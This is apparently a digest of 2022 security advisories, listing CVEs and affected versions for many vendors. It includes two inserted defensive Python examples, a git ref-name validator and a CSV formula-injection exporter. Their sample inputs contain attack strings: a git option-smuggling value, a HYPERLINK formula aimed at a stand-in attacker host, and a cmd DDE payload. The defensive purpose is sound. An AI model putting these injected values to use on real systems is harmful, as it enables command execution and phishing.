An out-of-bounds read vulnerability has been discovered in the SNMP process of MikroTik
RouterOS. The affected versions are MikroTik RouterOS before stable v7.6.
CVE ID: CVE-2022-45315 (Critical)
An out-of-bounds read vulnerability has been discovered in the hotspot process of MikroTik
RouterOS. The affected versions are MikroTik RouterOS before stable v7.5.
CVE ID: CVE-2022-45313 (Critical)
An OS command injection vulnerability has been discovered in Nako3edit. The affected
versions are Nako3edit (PC Version) v3.3.74 and below.
CVE ID: CVE-2022-42496 (Critical)
An OS command injection vulnerability has been discovered in Nadesiko3. The affected
versions are Nadesiko3 (PC Version) v3.3.61 and below.
CVE ID: CVE-2022-41642 (Critical)
Ubuntu has released security updates to address multiple vulnerabilities in U-Boot package.
An attacker can exploit these vulnerabilities to take control of an affected system. The
affected products are Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS.
CVE ID: CVE-2022-2347 (High), CVE-2022-30552 (Medium), CVE-2022-30790 (High),
CVE-2022-30767 (Critical), CVE-2022-33103 (High), CVE-2022-33967 (High), CVE-2022-34835
(Critical)
Dell has released a security update to resolve a Spring Framework vulnerability in Dell
NetWorker. The affected versions are NetWorker prior to 19.7.
CVE ID: CVE-2022-22950 (Medium)
Multiple OpenSSL-related vulnerabilities have been discovered in Hitachi Energy's Network
Manager Process Communication Unit PCU400 product. Security updates and mitigations are
available.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High)
Zyxel has released security updates to address a reflected XSS vulnerability in the CGI
program of its firewalls that could allow an attacker to trick a user into visiting a
crafted URL carrying the XSS payload.
CVE ID: CVE-2022-40603
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Intel has released security updates to address escalation of privilege and information
disclosure vulnerabilities in Intel Server Boards BMC firmware. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-40242 (High), CVE-2022-2827 (High)
Google has released Dev channel 110.0.5449.3 for Windows, and Dev channel OS version:
15263.0.0, Browser version: 110.0.5447.0 for most ChromeOS devices.
Microsoft has released Microsoft Edge Stable Channel (Version 108.0.1462.42) to resolve
multiple vulnerabilities. This update contains a fix for CVE-2022-4262, for which an
exploit exists in the wild.
CVE ID: CVE-2022-4262 (High), CVE-2022-41115 (Medium), CVE-2022-44688 (Medium),
CVE-2022-44708 (High)
A heap-based buffer overflow vulnerability has been discovered in Vim (GitHub repository
vim/vim). The affected versions are Vim prior to 9.0.0742.
CVE ID: CVE-2022-3491 (Critical)
A command injection vulnerability via the System Checks function has been discovered in the
D-Link DHP-W310AV. The affected version is D-Link DHP-W310AV 3.10EU.
CVE ID: CVE-2022-44930 (Critical)
An access control vulnerability has been discovered in the D-Link DVG-G5402SP that allows
unauthenticated attackers to escalate privileges by arbitrarily editing VoIP SIB profiles.
The affected version is D-Link DVG-G5402SP GE_1.03.
CVE ID: CVE-2022-44929 (Critical)
A command injection vulnerability via the Maintenance function has been discovered in the
D-Link DVG-G5402SP. The affected version is D-Link DVG-G5402SP GE_1.03.
CVE ID: CVE-2022-44928 (Critical)
An unauthenticated command injection vulnerability has been discovered in the product
license validation function of Telos Alliance Omnia MPX Node. The affected versions are
Telos Alliance Omnia MPX Node 1.3.* - 1.4.*.
CVE ID: CVE-2022-43325 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Telenia Software s.r.l
TVox. The affected versions are Telenia Software s.r.l TVox before v22.0.17.
CVE ID: CVE-2022-43333 (Critical)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-46391, CVE-2020-8287 (Medium), CVE-2018-11490 (High), CVE-2019-15133
(Medium), CVE-2022-0235 (Medium), CVE-2018-16472 (High), CVE-2021-23518
(Critical)
Contec Co. has released security updates to address a cross-site scripting vulnerability in
SolarView Compact. The affected versions are SolarView Compact SV-CPT-MC310 prior to
Ver.8.02, and SV-CPT-MC310F prior to Ver.8.02.
CVE ID: CVE-2022-44355 (Medium)
Debian has released security updates to address multiple vulnerabilities in clamav, and
jhead. An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-34055 (High), CVE-2022-41751 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google has released Chrome 108 (108.0.5359.79) for Android, and Stable channel 108.0.5359.94
for Mac and Linux and 108.0.5359.94/.95 for Windows. This update contains a fix for
CVE-2022-4262, for which an exploit exists in the wild.
CVE ID: CVE-2022-4262 (High)
Remote Code Execution vulnerability has been discovered in Zenario CMS. The affected version
is Zenario CMS 9.3.57186.
CVE ID: CVE-2022-44136 (Critical)
It has been discovered that Gitea does not sanitize and escape refs in the git backend, so
arguments to git commands are mishandled. The affected versions are Gitea before 1.17.3.
CVE ID: CVE-2022-42968 (Critical)
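The bug class above (an unescaped, user-controlled ref name reaching a git command line) is usually hardened in two steps: refuse ref names git would not accept, and pass the ref in its fully qualified refs/... form so that it can never be read as an option. The code below is an added example, not Gitea's own implementation; the ref-name rules are a conservative subset of what git check-ref-format enforces, and the sample inputs are constructed.

```python
"""Added example (not Gitea's code): validating a user-supplied ref name and
passing it to git in a form that cannot be mistaken for an option."""
import re
import subprocess

# A conservative subset of the rules `git check-ref-format` enforces. Anything
# that fails here is refused; git itself remains the final authority.
_FORBIDDEN = re.compile(r"\.\.|@\{|[ ~^:?*\[\\\x00-\x1f\x7f]")


def is_safe_ref(name: str) -> bool:
    """True only for ref names git would accept and that cannot start with '-'."""
    if not name or name == "@" or name.startswith("-"):
        return False
    if name.endswith("/") or name.endswith(".lock") or name.endswith("."):
        return False
    if _FORBIDDEN.search(name):
        return False
    return all(part and not part.startswith(".") and not part.endswith(".lock")
               for part in name.split("/"))


def qualify_ref(name: str, kind: str = "heads") -> str:
    """Return the fully qualified ref (refs/heads/... or refs/tags/...).
    A fully qualified ref always begins with 'refs/', so even if validation
    were bypassed the argument could never be parsed by git as an option."""
    if kind not in ("heads", "tags"):
        raise ValueError("kind must be 'heads' or 'tags'")
    if not is_safe_ref(name):
        raise ValueError(f"refusing unsafe ref name: {name!r}")
    return f"refs/{kind}/{name}"


def git_argv(subcommand: list, name: str, kind: str = "heads") -> list:
    """Build an argv list (no shell), e.g.
    ['git', 'rev-parse', '--verify', 'refs/heads/main']."""
    return ["git", *subcommand, qualify_ref(name, kind)]


def run_git(repo_dir: str, subcommand: list, name: str, kind: str = "heads") -> str:
    """Run git without a shell so the ref is never word-split or glob-expanded."""
    result = subprocess.run(git_argv(subcommand, name, kind), cwd=repo_dir,
                            check=True, capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs: the second, third and fourth are the shapes an
    # attacker would submit to smuggle an option or a path into the command.
    for candidate in ("main", "--upload-pack=touch /tmp/pwned", "a b", "feature/../x"):
        print(f"{candidate!r}: {'ok' if is_safe_ref(candidate) else 'rejected'}")
```

Building an argv list and never using shell=True is part of the defence: quoting or escaping for a shell is not needed when there is no shell, and the remaining risk is only git's own option parsing, which the refs/ prefix closes off.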
Red Hat has released security updates to address multiple vulnerabilities in several
products.
CVE ID: CVE-2022-44620 (High), CVE-2022-44606 (High), CVE-2022-43464
(High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google has released Stable channel 108.0.5359.75 (Platform version: 15183.59.0) for most
ChromeOS devices, Beta channel 109.0.5414.21 (Platform version: 15236.21.0) for most
ChromeOS devices, Chrome Dev 110 (110.0.5448.3) for Android, Dev channel 110.0.5449.0 for
Mac, Linux and Windows, Chrome 109.0.5414.25 Beta channel for Windows, Mac and Linux, Dev
channel 109.0.5414.21 (Platform version: 15236.21.0) for most ChromeOS devices, Chrome Beta
109 (109.0.5414.23) for Android, and Chrome Beta 109 (109.0.5414.25) for iOS.
CVE ID: CVE-2022-4176 (High)
Cuba ransomware actors are targeting critical sectors by exploiting an elevation of
privilege vulnerability in the Windows Common Log File System (CLFS) driver to steal system
tokens, and the ZeroLogon vulnerability to gain Domain Administrator privileges.
It has been discovered that BD's BodyGuard infusion pumps allow access through the RS-232
(serial) port interface. Successful exploitation can allow an attacker to change
configuration settings or disable the pump.
CVE ID: CVE-2022-43557 (Medium)
Multiple vulnerabilities have been discovered in Horner Automation's Remote Compact
Controller (RCC) 972. Successful exploitation can allow an attacker to obtain credentials of
the affected device and take complete control of it. Mitigations are available.
CVE ID: CVE-2022-2640 (High), CVE-2022-2641 (Critical), CVE-2022-2642
(High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-3859 (High), CVE-2021-3975 (Medium), CVE-2022-41316 (Medium),
CVE-2022-42898 (Medium), CVE-2021-25642 (High)
It has been discovered that a vulnerability in the use of functions of an undocumented
protocol in multiple Festo products can lead to a complete loss of confidentiality,
integrity and availability.
CVE ID: CVE-2022-3270 (Critical)
A SQL injection vulnerability has been discovered in Owncast (GitHub repository
owncast/owncast). The affected versions are Owncast prior to 0.0.13.
CVE ID: CVE-2022-3751 (Critical)
An unrestricted file upload vulnerability via a crafted PHP file has been discovered in
SolarView Compact. The affected versions are SolarView Compact 4.0 and 5.0.
A Remote Code Execution (RCE) vulnerability has been discovered in Russound XSourcePlayer.
The affected version is Russound XSourcePlayer 777D v06.08.03.
CVE ID: CVE-2022-44038 (Critical)
Grails Spring Security Core has released security updates to address a privilege escalation
vulnerability in its plugin.
CVE ID: CVE-2022-41923 (Critical)
UNIMO Technology has released a security update to address multiple vulnerabilities in
several of its digital video recorders. The affected products are UDR-JA1604, UDR-JA1608 and
UDR-JA1616 firmware versions 71x10.1.107112.43A and earlier.
CVE ID: CVE-2022-44620 (High), CVE-2022-44606 (High), CVE-2022-43464
(High)
Ubuntu has released security updates to address a race condition vulnerability in the snapd
package that can cause privilege escalation and execution of arbitrary code. The affected
products are Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS, Ubuntu 18.04 LTS, and Ubuntu
16.04 ESM.
CVE ID: CVE-2022-3328
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20867 (High), CVE-2022-20868 (High), CVE-2022-20922 (Medium),
CVE-2022-20943 (Medium)
Mozilla has released Thunderbird 102.5.1 to address a security vulnerability. An attacker
can exploit this vulnerability to take control of an affected system.
CVE ID: CVE-2022-45414 (Medium)
Google has released LTS channel 102.0.5005.189 (Platform Version: 14695.155.0) for most
ChromeOS devices, Dev channel 109.0.5414.25 for Windows, Mac and Linux, and Chrome Dev 109
(109.0.5414.23) for Android.
Huawei has released a security update to address an improper authorization vulnerability in
the Huawei Aslan Children's Watch that allows an attacker to access certain files.
CVE ID: CVE-2022-45874 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An arbitrary code execution vulnerability has been discovered in Badaso. The affected
version is Badaso version 2.6.3.
CVE ID: CVE-2022-41705 (Critical)
An authentication bypass vulnerability has been discovered in the WebConfig functionality of
Epson TM-C3500 and TM-C7500 devices. The affected version is firmware WAM31500 on Epson
TM-C3500 and TM-C7500 devices.
CVE ID: CVE-2022-36133 (Critical)
An improper restriction of excessive authentication attempts vulnerability has been
discovered in wger (GitHub repository wger-project/wger). The affected versions are wger
prior to 2.2.
CVE ID: CVE-2022-2650 (Critical)
A path traversal vulnerability has been discovered in Pilz PASvisu Server. The affected
versions are Pilz PASvisu Server before 1.12.0.
CVE ID: CVE-2022-40977 (Critical)
A vulnerability has been discovered in iTerm2 that mishandles a DECRQSS response. The
affected versions are iTerm2 before 3.4.18.
CVE ID: CVE-2022-45872 (Critical)
CODESYS has released security updates to address an inadequate encryption strength
vulnerability in CODESYS Development System V3. All CODESYS Development System V3 versions
prior to V3.5.18.40 are affected.
CVE ID: CVE-2022-4048 (High)
Multiple vulnerabilities have been discovered in Omron's PLC CJ and CS Series equipment. All
versions of the Omron PLC CJ series and CS series are affected. Mitigations are available.
CVE ID: CVE-2019-18259 (Medium), CVE-2019-13533 (High), CVE-2019-18269
(High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2016-2775 (Medium), CVE-2016-6170 (Medium), CVE-2022-39377 (Critical),
CVE-2022-3625 (High), CVE-2022-39188 (Medium), CVE-2022-3028 (High), CVE-2022-20422 (High),
CVE-2022-42719 (High), CVE-2022-2978 (High), CVE-2022-2153 (Medium), CVE-2022-40768
(Medium), CVE-2022-29901 (Medium), CVE-2022-3635 (High), CVE-2022-41222 (High),
CVE-2022-42703 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A Cross Site Scripting (XSS) vulnerability has been discovered in Orchardproject Orchard
CMS. The affected version is Orchardproject Orchard CMS 1.10.3.
CVE ID: CVE-2022-37720 (Critical)
An OS command injection vulnerability has been discovered in Apache Airflow Pig Provider.
The affected versions are Apache Airflow Pig Provider prior to 4.0.0. Mitigation is
available.
CVE ID: CVE-2022-40189 (Critical)
A double free vulnerability has been discovered in the Regexp compiler of Ruby. The affected
versions are Ruby 3.x before 3.0.4 and 3.1.x before 3.1.2.
CVE ID: CVE-2022-28738 (Critical)
Mitsubishi Electric has released security updates to resolve a Denial of Service (DoS)
vulnerability in its MELSEC iQ-R Ethernet Interface Module. The affected products are MELSEC
iQ-R Series RJ71EN71 firmware version 65 and prior, and R04/08/16/32/120ENCPU network part
firmware version 65 and prior.
CVE ID: CVE-2022-40265 (High)
NVIDIA has released security updates for NVIDIA GPU Display Driver to address multiple
vulnerabilities that can lead to code execution, Denial of Service (DoS), information
disclosure, escalation of privileges, or data tampering.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Microsoft has released Microsoft Edge Stable Channel (Version 107.0.1418.62) and Microsoft
Edge Extended Stable Channel (Version 106.0.1370.86) to resolve multiple vulnerabilities.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
CVE ID: CVE-2022-33187 (Medium), CVE-2022-42898 (Medium), CVE-2022-43933 (Medium),
CVE-2022-43934 (Medium), CVE-2022-43935 (Medium), CVE-2022-43936 (Medium)
An arbitrary code execution vulnerability has been discovered in PyTorch. The affected
versions are PyTorch before trunk/89695.
CVE ID: CVE-2022-45907 (Critical)
A Cross Site Scripting (XSS) vulnerability has been discovered in Fusiondirectory. The
affected version is Fusiondirectory 1.3.
CVE ID: CVE-2022-36180 (Critical)
An out-of-bounds read vulnerability has been discovered in the BGP daemon of FRRouting FRR
that can lead to a segmentation fault and Denial of Service (DoS). The affected versions are
FRRouting FRR before 8.4.
CVE ID: CVE-2022-37032 (Critical)
NTT DATA Corporation has released security updates to address a ClassLoader manipulation
vulnerability in TERASOLUNA Global Framework and TERASOLUNA Server Framework for Java
(Rich). The affected versions are TERASOLUNA Global Framework 1.0.0 (Public review version),
and TERASOLUNA Server Framework for Java (Rich) 2.0.0.2 to 2.0.5.1.
CVE ID: CVE-2022-43484 (Critical)
Debian has released security updates to address multiple vulnerabilities in twisted, and frr
packages. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-39348 (Medium), CVE-2022-37032 (Critical)
Moxa has released security updates to resolve an improper input validation vulnerability in
Moxa EDR and TN Series routers. Successful exploitation can cause a buffer overflow that
crashes the web service.
Debian has released security updates to address multiple vulnerabilities in
jackson-databind, and varnish. An attacker can exploit these vulnerabilities to take control
of an affected system.
CVE ID: CVE-2020-11653 (High), CVE-2022-45060 (High), CVE-2020-36518 (High),
CVE-2022-42003 (High), CVE-2022-42004 (High)
A pre-authentication buffer overflow vulnerability has been discovered in TOTOLINK LR350.
The affected version is TOTOLINK LR350 V9.3.5u.6369_B20220309.
CVE ID: CVE-2022-44255 (Critical)
A SQL Injection vulnerability has been discovered in Apartment Visitor Management System.
The affected version is Apartment Visitor Management System v1.0.
CVE ID: CVE-2022-44139 (Critical)
A command injection vulnerability has been discovered in Alarm instance management. The
affected versions are Alarm instance management below 2.0.6. Security updates are available.
CVE ID: CVE-2022-45462 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Mitel MiCollab. The
affected versions are Mitel MiCollab through 9.6.0.13.
CVE ID: CVE-2022-41326 (Critical)
Juniper Networks has released security updates to address a use after free vulnerability in
the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved that can
cause Denial of Service (DoS).
CVE ID: CVE-2022-22208 (Medium)
Omron has released a security update to address use after free, out-of-bounds write, and
stack-based buffer overflow vulnerabilities in OMRON CX-Programmer. The affected versions
are CX-Programmer v9.77 and earlier.
CVE ID: CVE-2022-43508 (High), CVE-2022-43509 (High), CVE-2022-43667
(High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Google has released Chrome 107 (107.0.5304.141) for Android, Extended Stable 106.0.5249.199
for Windows & Mac, and Stable channel 107.0.5304.121 for Mac & Linux and 107.0.5304.121/.122
for Windows to resolve a heap buffer overflow vulnerability.
CVE ID: CVE-2022-4135 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-42003 (High), CVE-2022-41323 (High), CVE-2022-31123 (High),
CVE-2021-3770 (High)
TP-Link has released a security update to address an improper input processing vulnerability
in tdpServer of the TP-Link RE300 V1. The affected versions are TP-Link RE300 V1 firmware
prior to 221009.
CVE ID: CVE-2022-41783 (Medium)
Improper Authentication and Improper Input Validation vulnerabilities have been discovered
in Moxa routers. Moxa has developed appropriate solutions to address these vulnerabilities.
CVE ID: CVE-2022-41758, CVE-2022-41759
Multiple vulnerabilities have been discovered in Mitsubishi Electric's GOT2000 Series,
MELSEC iQ-R/F/L Series, and MELSEC iQ-R Series equipment. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-40266 (Medium), CVE-2022-25164 (High), CVE-2022-29825 (Medium),
CVE-2022-29826 (Medium), CVE-2022-29827 (Medium), CVE-2022-29828 (Medium), CVE-2022-29829
(Medium), CVE-2022-29830 (Critical), CVE-2022-29831 (High), CVE-2022-29832 (Low),
CVE-2022-29833 (Medium)
It has been discovered that the Contact Form 7 Database Addon WordPress plugin does not
validate data when writing it back out to a CSV file, which can lead to CSV injection. The
affected versions are Contact Form 7 Database Addon WordPress plugin before 1.2.6.5.
CVE ID: CVE-2022-3634 (Critical)
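CSV injection of the kind described above happens when a stored value beginning with a formula trigger character is written to a CSV that is later opened in a spreadsheet. The exporter below is an added example of the general fix, not the plugin's code; the sample submissions are constructed.

```python
"""Added example (not the plugin's code): neutralising spreadsheet formula
injection when exporting user-supplied form data to CSV."""
import csv
import io

# Leading characters that make Excel, LibreOffice or Google Sheets evaluate a
# cell as a formula. Tab and carriage return are included because some
# spreadsheet applications trim leading whitespace before deciding.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Return `value` as text a spreadsheet will not evaluate as a formula."""
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        # A leading single quote forces text interpretation; the csv module
        # separately handles quoting of delimiters and double quotes.
        return "'" + text
    return text


def export_rows(rows, fieldnames) -> str:
    """Write `rows` (list of dicts) to a CSV string, neutralising every cell.
    Neutralisation happens once, at output time, on the untrusted values."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({key: neutralize_cell(row.get(key)) for key in fieldnames})
    return buf.getvalue()


# Constructed sample submissions; the second row carries typical payloads.
SAMPLE_SUBMISSIONS = [
    {"name": "Alice", "email": "alice@example.com", "message": "Hello"},
    {"name": '=HYPERLINK("http://attacker.example/x","click")',
     "email": "bob@example.com",
     "message": "-2+3+cmd|' /C calc'!A0"},
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_SUBMISSIONS, ["name", "email", "message"]))
```

The trade-off is that legitimate values starting with a minus sign (negative numbers, phone numbers written with a leading dash) also receive the prefix; an exporter that knows a column is numeric can skip neutralisation for that column only.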
A block bypass vulnerability has been discovered in the iQ Block Country plugin for
WordPress. The affected versions are iQ Block Country plugin 1.2.18 and below.
CVE ID: CVE-2022-41155 (Critical)
Remote code execution vulnerability has been discovered in Linaro Automated Validation
Architecture (LAVA). The affected versions are LAVA before 2022.11.1.
CVE ID: CVE-2022-45132 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-3550 (High), CVE-2022-3551 (Medium), CVE-2022-43680 (High),
CVE-2017-12618 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20961 (High), CVE-2022-3602 (High), CVE-2022-3786 (High),
CVE-2022-20963 (Medium), CVE-2022-20962 (Medium)
Dell has released security updates to resolve multiple vulnerabilities in Dell Cloud Tiering
Appliance (CTA). All versions of CTA 13.1 and CTA 13.2 are affected.
Huawei has released security updates to address an improper input validation vulnerability
in the Huawei Aslan Children's Watch and an insufficient authentication vulnerability in
Huawei band products.
CVE ID: CVE-2022-39012 (High), CVE-2022-41579 (High)
Foxit has released an updated Foxit PDF Editor for Mac 11.1.4, to resolve multiple
vulnerabilities in Foxit PDF Editor for Mac 11.1.3.0920 and earlier for macOS.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to resolve multiple parsing error vulnerabilities in
the mp4 module of Nginx, which can result in denial of service, memory disclosure or
execution of arbitrary code when processing a malformed mp4 file.
CVE ID: CVE-2021-3618 (High), CVE-2022-41741 (High), CVE-2022-41742
(High)
It has been discovered that BIG-IP and BIG-IQ of F5 are vulnerable to cross-site request
forgery (CSRF) attacks through iControl SOAP.
CVE ID: CVE-2022-41622 (High)
Zyxel has released security update to address a pre-configured password vulnerability in its
LTE indoor router LTE3301-M209. The affected versions are LTE3301-M209 V1.00(ABLG.4)C0 and
earlier.
CVE ID: CVE-2022-40602
A Cross Site Scripting (XSS) vulnerability has been discovered in Beekeeper Studio that
allows execution of arbitrary web scripts or HTML via a crafted payload injected into the
error modal container. The affected version is Beekeeper Studio v3.6.6.
CVE ID: CVE-2022-43143 (Critical)
A use-after-free vulnerability has been discovered in drachtio-server. The affected version
is drachtio-server 0.8.18.
CVE ID: CVE-2022-45474 (Critical)
A vulnerability has been discovered in a D-Link router that allows injection of a command
through an interface that runs with root permissions on the router.
CVE ID: CVE-2022-36786 (Critical)
It has been discovered that a vulnerability in Pillow allows deletion of files because spaces
in temporary pathnames are mishandled. The affected versions are Pillow before 9.0.1.
CVE ID: CVE-2022-24303 (Critical)
AVEVA has released a security update to address multiple vulnerabilities in AVEVA Edge.
Successful exploitation of these vulnerabilities can allow an attacker to insert malicious
DLL files and trick the application into executing code. The affected versions are AVEVA
Edge 2020 R2 SP1, AVEVA Edge 2020 R2 SP1 w/ HF 2020.2.00.40, and AVEVA Edge 2020 R2 and all
prior versions.
CVE ID: CVE-2016-2542 (High), CVE-2021-42794 (Medium), CVE-2021-42796 (Critical),
CVE-2021-42797 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-39377 (Critical), CVE-2022-39316 (High), CVE-2022-39283 (High),
CVE-2022-39317, CVE-2022-39282 (High), CVE-2022-39347 (High), CVE-2022-39318 (High),
CVE-2022-39320, CVE-2022-39319 (Critical)
Phoenix Contact has released a security update to address improper restriction of
operations within the bounds of a memory buffer, and out-of-bounds read vulnerabilities in
its Automation Worx Software Suite. The affected components of Automation Worx Software
Suite are Config+ versions 1.89 and prior, PC Worx versions 1.89 and prior and PC Worx
Express versions 1.89 and prior.
CVE ID: CVE-2022-3461 (High), CVE-2022-3737 (High)
Multiple vulnerabilities have been discovered in GE's CIMPLICITY equipment that can crash the
device being accessed or allow arbitrary code execution. The affected versions are
CIMPLICITY versions 2022 and prior.
CVE ID: CVE-2022-3084 (High), CVE-2022-2952 (High), CVE-2022-2948 (High),
CVE-2022-2002 (High), CVE-2022-3092 (High)
Multiple Cross Site Scripting (XSS) vulnerabilities have been discovered in Digital Alert
Systems' DASDEC equipment. Successful exploitation can result in false alerts being issued
to broadcast or cable sites that are immediately connected to the compromised system.
CVE ID: CVE-2019-18265 (Medium), CVE-2022-40204 (Medium)
Moxa has released security updates to resolve an improper privilege management vulnerability
in its Arm-based computers, the UC and DA Series and the AIG-300 Series.
CVE ID: CVE-2022-3088 (High)
Moodle has released security updates to address multiple vulnerabilities in several
products.
CVE ID: CVE-2022-45152, CVE-2022-45151, CVE-2022-45150, CVE-2022-45149,
CVE-2021-23414
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-35737 (High), CVE-2022-2929 (Medium), CVE-2022-2928 (High),
CVE-2017-6888 (Medium), CVE-2020-0499 (Medium), CVE-2021-0561 (Medium), CVE-2022-39260
(High), CVE-2022-39253 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An insufficient session expiration vulnerability has been discovered in LibreNMS (GitHub
repository librenms/librenms). The affected versions are LibreNMS prior to 22.10.0.
CVE ID: CVE-2022-4070 (Critical)
An arbitrary system command execution vulnerability has been discovered in BACKCLICK
Professional. The affected version is BACKCLICK Professional 5.9.63.
CVE ID: CVE-2022-44000 (Critical)
A heap based buffer overflow vulnerability has been discovered in the HTTP server
functionality of Micrium uC-HTTP that allows Remote Code Execution (RCE) via HTTP request.
The affected version is Micrium uC-HTTP 3.01.01.
CVE ID: CVE-2022-24942 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Roxy Fileman. The
affected version is Roxy Fileman 1.4.6.
CVE ID: CVE-2022-40797 (Critical)
Cradlepoint has released a security update to address a command injection vulnerability in
its IBR600. The affected versions are Cradlepoint IBR600 NetCloud OS (NCOS) 6.5.0.160bc2e
and prior.
CVE ID: CVE-2022-3086 (High)
Palo Alto Networks has released security updates to resolve a local privilege escalation
vulnerability in Palo Alto Networks Cortex XSOAR engine software running on a Linux
operating system.
CVE ID: CVE-2022-0031 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
CVE ID: CVE-2022-21831 (Critical), CVE-2022-22577 (Medium), CVE-2022-40664
(Critical), CVE-2022-42004 (High), CVE-2022-43680 (High)
A vulnerability has been discovered in Atlassian Crowd that allows an attacker to
authenticate as the crowd application via a security misconfiguration and subsequently call
privileged endpoints in Crowd's REST API under the usermanagement path. The affected
products are Atlassian Crowd versions 3.x.x, versions 4.x.x before version 4.4.4, and
versions 5.x.x before 5.0.3.
CVE ID: CVE-2022-43782 (Critical)
A command injection vulnerability has been discovered in Bitbucket Server and Data Center
that allows execution of arbitrary code on the affected system.
CVE ID: CVE-2022-43781 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in BACKCLICK Professional.
The affected version is BACKCLICK Professional 5.9.63.
CVE ID: CVE-2022-44006 (Critical)
Hive ransomware, which operates as Ransomware-as-a-Service (RaaS), is exploiting Microsoft
Exchange Server vulnerabilities to gain initial access and compromise systems of businesses
and critical infrastructure sectors, including government facilities, the communications
sector, critical manufacturing, Information Technology (IT), and especially Healthcare and
Public Health (HPH).
CVE ID: CVE-2021-31207 (High), CVE-2021-34473 (Critical), CVE-2021-34523 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Red Lion Controls has released security updates to address a path traversal vulnerability in
its Crimson equipment. The affected versions are Crimson 3.0 version 707.000 and prior,
Crimson 3.1 version 3126.001 and prior, and Crimson 3.2 version 3.2.0044.0 and prior.
CVE ID: CVE-2022-3090 (High)
Mitsubishi Electric has released security updates to resolve a malicious code execution
vulnerability in multiple software products.
CVE ID: CVE-2020-14521
Six Apart has released security updates to resolve multiple vulnerabilities in several
versions of Movable Type.
CVE ID: CVE-2022-45113, CVE-2022-45122, CVE-2022-43660
It has been discovered that Netatalk version 3.1.12 contains multiple error and memory
management vulnerabilities that can cause Remote Code Execution (RCE) as well as
out-of-bounds read.
CVE ID: CVE-2022-0194, CVE-2022-23121, CVE-2022-23122, CVE-2022-23123,
CVE-2022-23124, CVE-2022-23125
A SQL injection vulnerability via the password parameter has been discovered in Human
Resource Management System v1.0.
CVE ID: CVE-2022-43262 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in Cisco Identity Services Engine (ISE) that
can allow injection of arbitrary operating system commands, bypass security protections, and
conduct Cross Site Scripting (XSS) attacks.
CVE ID: CVE-2022-20964, CVE-2022-20965, CVE-2022-20966, CVE-2022-20967
Sophos has released security updates to resolve an XML External Entity (XXE)
vulnerability in Sophos Mobile managed on-premises that allows Server-Side Request Forgery
(SSRF) and potential code execution.
CVE ID: CVE-2022-3980 (Critical)
